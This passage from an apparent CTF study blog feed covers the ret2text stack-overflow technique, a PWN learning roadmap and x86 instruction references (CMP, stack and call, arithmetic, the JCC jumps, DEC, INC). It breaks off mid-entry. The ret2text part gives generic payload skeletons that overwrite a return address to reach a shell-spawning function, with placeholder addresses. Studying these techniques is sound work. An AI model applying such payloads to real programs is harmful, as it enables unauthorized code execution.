### Memory Layout Requirements
A successful ret2text attack requires the following memory layout conditions:
1. **Fixed code segment location**: the program should not enable *PIE (Position Independent Executable)* protection; otherwise, randomization of the code segment base address increases the difficulty of locating targets
2. **Target address must be executable**: the target code location must have execute permissions, which is usually naturally satisfied in the code segment on modern systems
3. **Known offset to the return address**: the overflow is relative to the buffer, so no absolute stack address is needed, even with ASLR enabled; only the distance from the buffer to the saved return address must be determined

## Applicable Scenario Analysis
### Ideal Application Environment
The ret2text technique is best suited to the following scenarios:
- **Compiled with PIE disabled**: the program was compiled with `-no-pie` (many modern toolchains enable PIE by default), so the code segment load address is fixed
- **Presence of dangerous functions**: the program contains functions such as `system` and `execve` that can directly obtain a shell
- **Stack overflow vulnerability**: a stack buffer overflow exists that can overwrite the return address
- **NX is not an obstacle**: the target lies in the .text section, which stays executable even when NX is enabled

### Typical Vulnerability Matches
This technique mainly applies to the following vulnerability types:
- Stack buffer overflow: classic stack overflow vulnerabilities
- &lt;mark&gt;Format string vulnerabilities&lt;/mark&gt; combined with stack write capabilities
- Certain cases of &lt;mark&gt;off-by-one overflows&lt;/mark&gt; on the stack

## Technical Implementation Steps
### Basic Exploitation Workflow
1. **Vulnerability identification and analysis**
   - Determine the input point where the stack overflow vulnerability exists
   - Analyze the offset between the overflow point and the return address
   - Use debugging tools (such as gdb) to verify the accuracy of the offset

2. **Target function location**
   - Use disassembly tools (such as IDA, objdump) to analyze the program
   - Search for directly exploitable dangerous functions (such as `system(&quot;/bin/sh&quot;)`)
   - Record the exact address of the target function

3. **Payload construction**
   ```python
   # Typical payload structure
   payload = b&quot;A&quot; * offset    # pad up to the return address
   payload += p64(target_addr) # overwrite the return address with the target function&apos;s address
   ```

4. **Exploitation verification**
   - Send the crafted payload to the target program
   - Verify whether control flow successfully jumps to the target function
   - Obtain a shell or perform the expected operation

### Parameter Passing Techniques
When the target function requires parameters, additional stack frame construction is needed:
- **x86 architecture**: according to the cdecl calling convention, parameters are pushed onto the stack from right to left
- **x64 architecture**: the first several parameters are passed via registers (rdi, rsi, rdx, etc.), so suitable gadgets are needed to set the registers
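
The difference between the two conventions shows up directly in the payload layout. The sketch below uses placeholder values throughout (offset, target, argument, and gadget address are all assumptions), with local `p32` and `p64` helpers standing in for the pwntools functions.

```python
# Minimal sketch: payload layout for calling target(arg) after the padding.
# All addresses and the offset are placeholder assumptions.
def p32(value):
    return value.to_bytes(4, "little")

def p64(value):
    return value.to_bytes(8, "little")

OFFSET = 40             # bytes from the buffer to the saved return address
TARGET = 0x401136       # function to call, e.g. one that takes a string
ARG = 0x404060          # argument value, e.g. address of "/bin/sh"
POP_RDI = 0x401203      # pop rdi; ret (x64 only)

# x86 (cdecl): the callee expects [return address][arg1] on the stack,
# so a dummy return address sits between the target and its argument.
payload_x86 = b"A" * OFFSET + p32(TARGET) + p32(0xdeadbeef) + p32(ARG)

# x64 (System V): the first argument travels in rdi, so a gadget loads it
# from the stack before control reaches the target.
payload_x64 = b"A" * OFFSET + p64(POP_RDI) + p64(ARG) + p64(TARGET)

print(len(payload_x86), len(payload_x64))
```

On x64 the extra gadget means the exploit is already a short ROP chain rather than a single overwritten address.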

## Technical Evolution and Related Techniques
### Relationship with Other Techniques
ret2text is the foundation of more complex exploitation techniques:
- **[[ret2libc]]**: when the program itself has no dangerous functions, jump to libc library functions
- **[[ROP]] technique**: chain multiple code snippets together to perform complex operations
- **[[SROP]] technique**: use signal handling mechanisms to perform system calls

### Technical Limitations
The main limitations of ret2text include:
- &lt;mark&gt;Dependence on the presence of dangerous functions in the program&lt;/mark&gt;
- Sensitivity to modern protection mechanisms
- Increased exploitation difficulty when parameter passing is complex

---

*As a cornerstone of control-flow hijacking techniques, the principles and ideas of ret2text run throughout the entire field of binary exploitation. Although modern protection mechanisms have limited its direct application, a deep understanding of ret2text remains irreplaceably valuable for mastering more advanced exploitation techniques. During the learning process, it is recommended to focus on understanding the underlying principles rather than merely using tools, so that you can respond flexibly to various challenges in complex real-world environments.*</content:encoded></item><item><title>Pwn</title><link>https://goosequill.erina.top/en/blog/202511251712/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511251712/</guid><description>Import notes for Pwn</description><pubDate>Tue, 25 Nov 2025 06:17:00 GMT</pubDate><content:encoded>##  Pwn

## PWN Overview (Direction Outline)

```
      ┌────────────────────┐
      │ CTF Overview (Hub) │
      └─────────┬──────────┘
                │
                ▼
        ┌──────────────┐
        │     PWN      │  ← you are here
        └──────┬───────┘
               │
    ┌──────────┼──────────┐
    ▼          ▼          ▼
Knowledge  Challenge    Tool
  base      reviews     index
```

PWN (Binary Exploitation) is the CTF field that best trains low-level skills. This note serves as the main hub node for the PWN track, used to connect all subfields, knowledge categories, and toolchains.

## The Goals and Essence of PWN

The core goals of PWN are:
- Understand how a program can be controlled
- Understand memory layout and Linux runtime mechanisms
- Build attack chains through vulnerabilities to hijack control flow or program behavior
- Bypass various modern security mechanisms

The essence of PWN is a complete reasoning process of &quot;from source code → assembly → memory → control flow&quot;.

## The Overall Knowledge Structure of PWN
The PWN knowledge system can generally be divided into the following main lines:
Program fundamentals
- Program compilation and linking process  
- ELF file structure
- Calling conventions  
- Stack frame structure

Common vulnerability types
- Stack overflow  
- Format string vulnerability  
- Integer overflow  
- UAF (Use-After-Free)  
- Double Free  
- Heap overflow  
- Off-by-one

Exploitation techniques
- ret2text  
- ret2libc  
- ROP chain construction  
- Syscall exploitation  
- Heap exploitation basics  
- GOT/PLT mechanism  
- libc leak logic

glibc / ld.so low-level mechanisms
- glibc runtime mechanisms  
- Dynamic linking and symbol resolution  
- Heap management mechanism (ptmalloc)

Security mechanisms and bypasses
- NX  
- PIE  
- ASLR  
- RELRO  
- Stack Canary  
- seccomp  

Toolchain and workflow
- pwntools  
- gdb (including pwndbg / peda)  
- IDA  
- readelf / objdump  
- glibc-all-in-one  
- patchelf

## The Learning Path for PWN (Recommended Starting Route)
1. Build a low-level foundation:  
   Learn to use gdb  
   Understand stack frames and calling conventions  
   Be able to read disassembly (basic instructions + control flow)

2. Master basic vulnerabilities:  
   Stack overflow → ret2libc  
   Format string vulnerabilities → leak + hijack  

3. Go deeper into exploitation chains:  
   ROP  
   Syscall  
   Introductory heap exploitation  

4. Strengthen heap-related skills:  
   chunk structure  
   fastbin and unsortedbin mechanisms  
   Common heap challenge topics (double free, unlink, etc.)

5. Understand the essence of glibc / ld.so:  
   Dynamic linking  
   Symbol resolution  
   libc leak logic  

This is a learning path that will run through all your future writeups and reviews.

## The Relationship Between PWN and Other Fields
- Deeply overlaps with Reverse: you need to understand function logic and assembly  
- Different from Crypto and Web: it tests program logic + low-level security  
- Less coupled with Forensic and Misc, but may involve system understanding  

You can think of PWN as the CTF field that &quot;most tests your control over systems&quot;.
## Secondary Structure Navigation Under PWN (Entering Subsystems)
PWN is further divided into:
- [[PWN知识体系]] (systematic index of all third-level knowledge points)
- [[PWN题目索引]] (summary of all challenge writeups)
- [[PWN工具索引]] (summary of tool-specific topics)

These three together form the main backbone of all PWN content.</content:encoded></item><item><title>CMP</title><link>https://goosequill.erina.top/en/blog/202511230551/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511230551/</guid><description>Import notes for CMP</description><pubDate>Sun, 23 Nov 2025 12:05:00 GMT</pubDate><content:encoded>##  CMP（cmp）

### Basic Function

CMP compares two operands without storing the result; it only updates EFLAGS based on the comparison.  
Its core behavior is equivalent to performing a subtraction whose result is discarded: `op1 - op2`.

### Instruction Execution Process

The following actions are performed during execution:

1. Compute `op1 - op2` (result not written back)
    
2. Update the flags based on the result: ZF, SF, OF, CF, PF, AF
    

### Instruction Format

- `cmp r/m32, r32`
- `cmp r/m64, r64`
- `cmp r/m32, imm32`
- `cmp r/m64, imm32`

### Behavioral Characteristics

- Does not modify either operand
    
- Only updates EFLAGS
    
- Often used together with conditional jumps (`je`/`jne`/`jg`/`jl`, etc.)
    
- Key flags:
    
    - ZF = 1 → the two are equal
        
    - SF/OF/CF are used to determine magnitude, sign, and overflow conditions
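
To see how the flags follow from the discarded subtraction, the sketch below models a 32-bit `cmp` with Python integers. It is a simplified model rather than a description of the hardware, covers only ZF, SF, CF, and OF, and `cmp_flags` is a hypothetical helper name.

```python
# Minimal sketch: model the flags a 32-bit `cmp op1, op2` would set.
BITS = 32
MOD = 2 ** BITS
SIGN = 2 ** (BITS - 1)

def cmp_flags(op1, op2):
    """Return ZF, SF, CF, OF for op1 - op2 without storing the result."""
    a, b = op1 % MOD, op2 % MOD
    result = (a - b) % MOD
    sign_a, sign_b, sign_r = a >= SIGN, b >= SIGN, result >= SIGN
    return {
        "ZF": int(result == 0),
        "SF": int(sign_r),
        "CF": int(b > a),   # unsigned borrow
        # signed overflow: operands differ in sign and the result's sign
        # differs from op1's
        "OF": int(sign_a != sign_b and sign_r != sign_a),
    }

print(cmp_flags(5, 5))        # equal operands
print(cmp_flags(3, 5))        # 3 - 5 borrows
print(cmp_flags(-2**31, 1))   # most negative value minus 1 overflows
```

Conditional jumps read these flags: `je` tests ZF, the unsigned `jb` tests CF, and the signed `jl` tests whether SF differs from OF.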
        

### Common Uses

- Conditional checks
    
- Loop termination checks
    
- Branch logic control
    
- Used in reverse engineering to infer variable relationships
    
- Used in PWN to determine key branch points in function logic</content:encoded></item><item><title>Stack and Call Class</title><link>https://goosequill.erina.top/en/blog/202511232150/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511232150/</guid><description>Import notes for the Stack and Call Class</description><pubDate>Sun, 23 Nov 2025 03:21:00 GMT</pubDate><content:encoded>##  Stack and Call Class

## Overview

This class of instructions governs the structure of a program&apos;s call chain and is central to function execution and return. In PWN, they are the most sensitive and critical instructions: all stack overflows, return address control, ROP, and call-chain hijacking revolve around these instructions.

Understanding these instructions means mastering the skeleton of program execution.

## Subclass Description

Stack frame construction  
Stack frame destruction  
Function calls and returns  
Control changes to the stack pointer (RSP) and base pointer (RBP)  
Various attack techniques (ROP / ret2...) all depend on a precise understanding of the behavior of these instructions

## Instruction List
### Stack Operations
- [[PUSH]]  
  Pushes data onto the top of the stack and automatically decrements the stack pointer (esp/rsp) by the operand size.

- [[POP]]  
  Pops data from the top of the stack into the target register or memory and increments the stack pointer.

### Calls and Returns

- [[CALL]]  
  Calls a function, automatically pushes the return address onto the stack, and transfers control flow to the target function.

- [[RET]]  
  Pops the return address from the stack and jumps to it; this is the basic mechanism of function return.
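
The interaction of these four instructions can be sketched with a toy model. Everything here is simplified and invented for illustration: `ToyCPU` is a hypothetical class, the addresses are made up, and the 5-byte instruction length is just the common size of a near `call`.

```python
# Minimal sketch: a toy model of push, pop, call and ret on a 64-bit stack.
# Addresses are invented; memory is a dict from address to 8-byte value.
class ToyCPU:
    def __init__(self, rsp=0x7ffc0000, rip=0x401000):
        self.rsp, self.rip, self.mem = rsp, rip, {}

    def push(self, value):
        self.rsp -= 8                  # the stack grows toward lower addresses
        self.mem[self.rsp] = value

    def pop(self):
        value = self.mem[self.rsp]
        self.rsp += 8
        return value

    def call(self, target, insn_len=5):
        self.push(self.rip + insn_len) # return address = next instruction
        self.rip = target

    def ret(self):
        self.rip = self.pop()          # whatever is on top becomes rip

cpu = ToyCPU()
cpu.call(0x401136)
saved_slot = cpu.rsp                   # where the return address lives
cpu.mem[saved_slot] = 0x401196         # simulate an overflow overwriting it
cpu.ret()
print(hex(cpu.rip))
```

The model shows why `ret` is the pivot of stack exploitation: it trusts whatever value sits at rsp.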

### Stack Frame Construction and Destruction

- [[LEAVE]]  
  Used for stack frame cleanup before a function returns: equivalent to the combination of `mov rsp, rbp` and `pop rbp`.</content:encoded></item><item><title>Data Transfer Class</title><link>https://goosequill.erina.top/en/blog/202511232111/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511232111/</guid><description>Import notes for the Data Transfer Class</description><pubDate>Sun, 23 Nov 2025 03:21:00 GMT</pubDate><content:encoded>##  Data Transfer Class

## Overview

Data transfer instructions are used to move, load, or store data between registers, memory, and the stack, and are the foundation for understanding the logic of any function.  
The backbone of almost every piece of assembly code is formed by chaining these instructions together—they determine “where the data is” and “where the data needs to go.”

## Subcategory Description

Register ↔ Register  
Register ↔ Memory  
Memory ↔ Memory (rare but possible)  
Special addressing mode handling (such as using LEA for address calculation)  
Stack-direction data transfer (`push`/`pop` also belong to the stack category, but may appear repeatedly)

## Instruction List
### Register / Memory Transfer

- [[MOV]]  
  Copies data between registers and memory, or loads an immediate value; it is the most basic data transfer instruction.

- [[LEA]]  
  Loads an effective address (Load Effective Address), commonly used for address calculation, pointer arithmetic, and offset summation.
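
The arithmetic that LEA performs can be written out as a one-line formula. The sketch below is an illustrative model of x86-64 effective-address calculation; `lea` is a hypothetical helper and the register values are invented.

```python
# Minimal sketch: the address arithmetic behind
# `lea dst, [base + index*scale + disp]`.
MASK64 = 2 ** 64

def lea(base=0, index=0, scale=1, disp=0):
    """Compute an effective address; no memory is read, unlike mov."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("scale must be 1, 2, 4 or 8")
    return (base + index * scale + disp) % MASK64

# lea rax, [rbp - 0x20]: address of a local buffer (rbp value is invented)
print(hex(lea(base=0x7ffc1000, disp=-0x20)))
# lea rax, [rdi + rdi*4]: a multiply-by-5 idiom compilers often emit
print(lea(base=7, index=7, scale=4))
```

When reversing, a `lea` with an rbp-relative operand usually marks the address of a local buffer being passed to a function.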

### Stack-Related Data Operations

- [[PUSH]]  
  Pushes data onto the top of the stack and adjusts the stack pointer (`esp`/`rsp`) to build the calling environment.

- [[POP]]  
  Pops data from the top of the stack into a register or memory to restore the calling environment.

### Auxiliary

- [[XCHG]]  
  Exchanges the values of two operands (registers or memory), commonly used for atomic operations or scheduling when temporary registers are insufficient.</content:encoded></item><item><title>Operations and Logic</title><link>https://goosequill.erina.top/en/blog/202511231504/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511231504/</guid><description>Import notes for Operations and Logic</description><pubDate>Sun, 23 Nov 2025 03:15:00 GMT</pubDate><content:encoded>##  Operations and Logic

## Overview
This category includes all basic instructions that directly modify the data itself, including arithmetic operations, logical processing, and increment/decrement operations related to loops. These instructions usually directly affect the flag registers (ZF, CF, OF, SF, etc.) and appear most frequently in reverse engineering analysis, encryption/decryption logic, length calculation, and state machine branching.

This category is intended to help you quickly locate “how data is being processed.”

## Subcategory Description

Arithmetic operations: perform addition, subtraction, multiplication, division, counting, and offset-related calculations on numeric values  
Logical operations: transform bit structures (AND, OR, NOT, XOR)  
Increment/decrement operations: common components of loop structures

## Instruction List
### Arithmetic Related
- **[[ADD]]**  
    Performs addition, modifying the carry flag (CF), overflow flag (OF), and others; it is the most common way to accumulate numeric values.
- **[[SUB]]**  
    Performs subtraction while also updating the flags; often similar in effect to `cmp` but actually changes the operand.
- **[[IMUL-MUL]]**  
    Performs signed (`imul`) and unsigned (`mul`) multiplication. The result may span high and low registers (such as RDX:RAX), and OF and CF are updated based on the result.
- **[[IDIV-DIV]]**  
    Performs signed (`idiv`) and unsigned (`div`) division, typically requiring the dividend to be placed in RDX:RAX (or EDX:EAX). If the result overflows or the divisor is 0, an exception is triggered.
- **[[INC]]**  
    Increments the operand by one without affecting CF (Carry Flag); commonly used for loop counters and address offsets.
- **[[DEC]]**  
    Decrements the operand by one, also without affecting CF; commonly seen in countdown loops and structure traversal.

### Logical Related
- **[[XOR]]**  
    Bitwise XOR, commonly used to clear a register (such as `xor eax, eax`), and also used in encryption and obfuscation.
- **[[AND]]**  
    Bitwise AND, used to mask specific bits, extract flag bits, or construct conditional checks.
- **[[OR]]**  
    Bitwise OR, used to set certain bits or combine logical conditions.
- **[[NOT]]**  
    Bitwise NOT, inverting all bits (the one’s complement); adding 1 to the result gives the two’s complement negation, so it often appears in bitwise construction.

### Shift Instructions (Logical/Arithmetic Structure Processing)

- **[[SHL]]**  
    Logical left shift, filling zeros on the right; used for multiplying by 2ⁿ and constructing bit-field layouts.
    
- **[[SHR]]**  
    Logical right shift, filling zeros on the left; commonly used for dividing by 2ⁿ or extracting high-order structures.
    

### Other Operation Types

- **[[NOP]]**  
    No-operation instruction that does not change register or memory contents; used for structure alignment, padding, debugging, and ROP filling.</content:encoded></item><item><title>JCC Instruction Set</title><link>https://goosequill.erina.top/en/blog/202511220451/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511220451/</guid><description>Import notes for the JCC instruction set</description><pubDate>Sat, 22 Nov 2025 12:04:00 GMT</pubDate><content:encoded>##  JCC Instruction Set

#### JE / JZ
(jump if equal / jump if zero)
Basic function  
Jump when the most recent comparison/arithmetic result is &quot;equal&quot; or the result is 0.
Jump condition (logic)
```
ZF == 1
```
RFLAGS (full diagram)
```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
|  ?  | [1] |  ?  |  ?  |  ?  |  ?  |
+-----------------------------------+
CF = carry, ZF = zero, SF = sign, OF = overflow, PF = parity, AF = auxiliary carry
```
Equivalent expression
```
if (ZF == 1) jump;
```
Common uses  
Branching after string or numeric equality checks (commonly used after `cmp`).
#### JNE / JNZ
(jump if not equal / jump if not zero)
Basic function  
Jump when the most recent comparison/arithmetic result is not equal or the result is non-zero.
Jump condition

```
ZF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  | [0] |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (ZF == 0) jump;
```

Common uses  
Continue loops, continue after failed searches, etc.

#### JA / JNBE
(jump if above / jump if not below or equal) (unsigned a &gt; b)
Basic function  
Used for unsigned comparison, indicating strictly greater than (a &gt; b, unsigned).

Jump condition

```
(CF == 0) &amp;&amp; (ZF == 0)
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [0] | [0] |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (!CF &amp;&amp; !ZF) jump; // unsigned a &gt; b
```

Common uses  
Memory length, unsigned index comparisons, etc.

#### JAE / JNB / JNC
(jump if above or equal / jump if not below / jump if not carry) (unsigned a &gt;= b)
Basic function  
Unsigned comparison &gt;=: no borrow (carry).

Jump condition

```
CF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [0] |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (!CF) jump; // unsigned a &gt;= b
```

Common uses  
Boundary checks (unsigned).

Note  
JAE = JNB = JNC (common aliases).

#### JB / JNAE / JC
(jump if below / jump if not above or equal / jump if carry) (unsigned a &lt; b)
Basic function  
Unsigned less than (with borrow).

Jump condition

```
CF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [1] |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (CF == 1) jump; // unsigned a &lt; b
```

Common uses  
Error/boundary checks.  
Note: JC (jump if carry) is an alias of JB.

#### JBE / JNA
(jump if below or equal / jump if not above) (unsigned a &lt;= b)
Basic function  
Unsigned less than or equal.

Jump condition

```
(CF == 1) || (ZF == 1)
```

RFLAGS (full diagram)

```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
| [1] |  ?  |  ?  |  ?  |  ?  |  ?  |   CF == 1
|  ?  | [1] |  ?  |  ?  |  ?  |  ?  |   or ZF == 1
+-----------------------------------+
```

Equivalent expression

```
if (CF || ZF) jump; // unsigned a &lt;= b
```

Common uses  
Array/buffer boundary checks (unsigned).
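
As a rough sketch of how the unsigned conditions follow from `cmp a, b`, the Python model below computes CF and ZF for a 32-bit subtraction and evaluates the four unsigned jump conditions listed so far. The function names `cmp_flags_unsigned` and `unsigned_jumps`, and the fixed 32-bit width, are assumptions made for illustration only.

```python
WIDTH = 32
MOD = 2 ** WIDTH


def cmp_flags_unsigned(a, b):
    """Model CF and ZF after `cmp a, b` on 32-bit operands."""
    a %= MOD
    b %= MOD
    diff = a - b
    result = diff % MOD
    cf = int(result != diff)   # wrap-around means a borrow occurred
    zf = int(result == 0)
    return cf, zf


def unsigned_jumps(a, b):
    """Return which unsigned conditional jumps would be taken."""
    cf, zf = cmp_flags_unsigned(a, b)
    return {
        "ja": cf == 0 and zf == 0,
        "jae": cf == 0,
        "jb": cf == 1,
        "jbe": cf == 1 or zf == 1,
    }


print(unsigned_jumps(5, 3))
print(unsigned_jumps(3, 5))
print(unsigned_jumps(4, 4))
```

Passing `-1` as `a` models the bit pattern `0xFFFFFFFF`, which compares as the largest unsigned value.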

#### JG / JNLE
(jump if greater / jump if not less or equal) (signed a &gt; b)

Basic function  
Used for signed integer comparison, indicating strictly greater than (a &gt; b, signed).

Jump condition

```
(ZF == 0) &amp;&amp; (SF == OF)
```

RFLAGS (full diagram)

```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
|  ?  | [0] |[SF] |[OF] |  ?  |  ?  |
|        (require SF == OF)         |
+-----------------------------------+
```

Equivalent expression

```
if ((ZF == 0) &amp;&amp; (SF == OF)) jump; // signed a &gt; b
```

Typical uses  
Signed comparison branches (such as signed integer sorting or conditional checks).

#### JGE / JNL
(jump if greater or equal / jump if not less) (signed a &gt;= b)

Basic function  
Signed &gt;=.

Jump condition

```
SF == OF
```

RFLAGS (full diagram)

```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
|  ?  |  ?  |[SF] |[OF] |  ?  |  ?  |
|        (require SF == OF)         |
+-----------------------------------+
```

Equivalent expression

```
if (SF == OF) jump; // signed a &gt;= b
```

Typical uses  
Signed boundary checks.

#### JL / JNGE
(jump if less / jump if not greater or equal) (signed a &lt; b)
Basic function  
Signed less than.
Jump condition
```
SF != OF
```

RFLAGS (full diagram)

```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
|  ?  |  ?  |[SF] |[OF] |  ?  |  ?  |
|        (require SF != OF)         |
+-----------------------------------+
```

Equivalent expression

```
if (SF != OF) jump; // signed a &lt; b
```

Typical uses  
Signed comparison branches (negative-number-related checks).

#### JLE / JNG
(jump if less or equal / jump if not greater) (signed a &lt;= b)
Basic function  
Signed less than or equal.
Jump condition

```
(ZF == 1) || (SF != OF)
```

RFLAGS (full diagram)

```
+-----------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-----------------------------------+
|  ?  | [1] |  ?  |  ?  |  ?  |  ?  |   ZF == 1
|  ?  |  ?  |[SF] |[OF] |  ?  |  ?  |   or SF != OF
+-----------------------------------+
```

Equivalent expression

```
if (ZF || (SF != OF)) jump; // signed a &lt;= b
```

Typical uses  
Signed range checks (&lt;=).
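
The signed conditions can be sketched the same way. The model below derives ZF, SF, and OF for a 32-bit `cmp a, b` and evaluates the four signed jumps; the helper names (`to_signed`, `cmp_flags_signed`, `signed_jumps`) and the 32-bit width are illustrative assumptions, not part of any real tool.

```python
WIDTH = 32
MOD = 2 ** WIDTH
SIGN = 2 ** (WIDTH - 1)


def to_signed(value):
    """Interpret a 32-bit pattern as a two's complement integer."""
    value %= MOD
    return value - MOD if value // SIGN else value


def cmp_flags_signed(a, b):
    """Model ZF, SF and OF after `cmp a, b` on 32-bit operands."""
    result = (a - b) % MOD
    zf = int(result == 0)
    sf = result // SIGN                        # top bit of the result
    true_diff = to_signed(a) - to_signed(b)    # mathematically exact difference
    of = int(true_diff != to_signed(result))   # exact value did not fit in 32 bits
    return zf, sf, of


def signed_jumps(a, b):
    """Return which signed conditional jumps would be taken."""
    zf, sf, of = cmp_flags_signed(a, b)
    return {
        "jg": zf == 0 and sf == of,
        "jge": sf == of,
        "jl": sf != of,
        "jle": zf == 1 or sf != of,
    }


print(signed_jumps(-1, 1))
print(signed_jumps(-2 ** 31, 1))   # overflow case: SF = 0 but OF = 1
```

The second call shows why the conditions compare SF with OF instead of reading SF alone: the subtraction overflows, yet `jl` is still taken.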

#### JO
(jump if overflow)
Basic function  
Jump when the previous arithmetic operation caused overflow (signed overflow).

Jump condition

```
OF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  | [1] |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (OF == 1) jump;
```

Common uses  
Detect signed overflow (for example, when an addition/subtraction result cannot be represented in the target bit width).

#### JNO
(jump if not overflow)
Basic function  
Jump when there is no overflow.

Jump condition

```
OF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  | [0] |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (OF == 0) jump;
```

#### JS
(jump if sign)
Basic function  
Jump when the result is negative (highest bit is 1), checking the sign bit.

Jump condition

```
SF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [1] |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (SF == 1) jump; // result negative (signed)
```

Common uses  
Detect negative numbers or branch on negative results in signed arithmetic.

#### JNS
(jump if not sign)
Basic function  
Jump when the result is non-negative (highest bit is 0).

Jump condition

```
SF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [0] |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (SF == 0) jump;
```

#### JP / JPE
(jump if parity / jump if parity even)
Basic function  
Jump when the parity of the most recent arithmetic or logical result is even (that is, PF == 1). PF indicates that the number of 1 bits in the low 8 bits of the result is even.

Jump condition

```
PF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  | [1] |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (PF == 1) jump;
```

Common uses  
Used in some parity-check logic in legacy code/protocols.
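
For illustration, PF can be modeled in a few lines of Python. The function name `parity_flag` is an assumption; the point is only that bits above the low byte never influence the flag.

```python
def parity_flag(result):
    """Model PF: 1 when the low 8 bits of the result hold an even number of 1 bits."""
    low_byte = result % 256
    ones = bin(low_byte).count("1")
    return int(ones % 2 == 0)


print(parity_flag(0b0011))   # two 1 bits in the low byte
print(parity_flag(0b0111))   # three 1 bits in the low byte
print(parity_flag(0x100))    # the set bit lies outside the low byte
```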

#### JNP / JPO
(jump if not parity / jump if parity odd)
Basic function  
Jump when PF == 0 (odd parity).

Jump condition

```
PF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  | [0] |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (PF == 0) jump;
```

#### JCXZ / JECXZ / JRCXZ
(jump if CX/ECX/RCX == 0)
Basic function  
Check whether CX/ECX/RCX is 0 and jump if so, without reading or modifying any flags. Commonly used to skip a loop whose counter is already 0; only a short-jump (8-bit displacement) encoding exists.

Jump condition

```
(CX == 0) or (ECX == 0) or (RCX == 0)
```

RFLAGS (full diagram)  
(These instructions test the register value directly and do not depend on any RFLAGS bits; the diagram is kept only for consistency with the other entries.)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (RCX == 0) jump;
```

Common uses  
Short loops, special-case branches in string/block processing.

---</content:encoded></item><item><title>DEC</title><link>https://goosequill.erina.top/en/blog/202511225702/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225702/</guid><description>Import notes for DEC</description><pubDate>Sat, 22 Nov 2025 11:57:00 GMT</pubDate><content:encoded>##  DEC (dec)

### Basic function
Performs -1 on the operand:  
`dest = dest - 1`
### Instruction execution process
- Subtract 1 from the destination operand
- Update all flags except CF (different from SUB x,1)

### Instruction format
```
dec r/m8
dec r/m16
dec r/m32
dec r/m64
```
### Behavioral characteristics
- Does not modify CF
- Modifies other common flags (ZF, SF, OF, PF, AF)
- Symmetrical with INC
- Used for loop decrements, countdown counters, etc.
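
A minimal Python sketch of the flag behavior described above, assuming a 32-bit operand; the name `dec32` and the dictionary layout are made up for this example. The incoming CF value is passed in and returned unchanged, which is the difference from `sub x, 1`.

```python
MOD = 2 ** 32
SIGN = 2 ** 31


def dec32(value, cf):
    """Model `dec r/m32`: returns (result, flags); CF is passed through unchanged."""
    value %= MOD
    result = (value - 1) % MOD
    flags = {
        "CF": cf,                    # untouched by DEC
        "ZF": int(result == 0),
        "SF": result // SIGN,        # top bit of the result
        "OF": int(value == SIGN),    # 0x80000000 - 1 overflows to 0x7FFFFFFF
    }
    return result, flags


print(dec32(1, 1))   # reaches zero, CF keeps its old value
print(dec32(0, 0))   # wraps to 0xFFFFFFFF without setting CF
```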

### Common uses
- Countdown (reverse-iterating) `for` loops
- Move a pointer backward
- Countdown control in state machines
- Simple counter decrement

---</content:encoded></item><item><title>INC</title><link>https://goosequill.erina.top/en/blog/202511225538/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225538/</guid><description>Import notes for INC</description><pubDate>Sat, 22 Nov 2025 11:55:00 GMT</pubDate><content:encoded>##  INC (inc)

### Basic Function
The INC instruction performs a +1 operation on the operand:  
`dest = dest + 1`
### Instruction Execution Process
- Add 1 to the destination operand
- Update all flags except CF

### Instruction Format
```
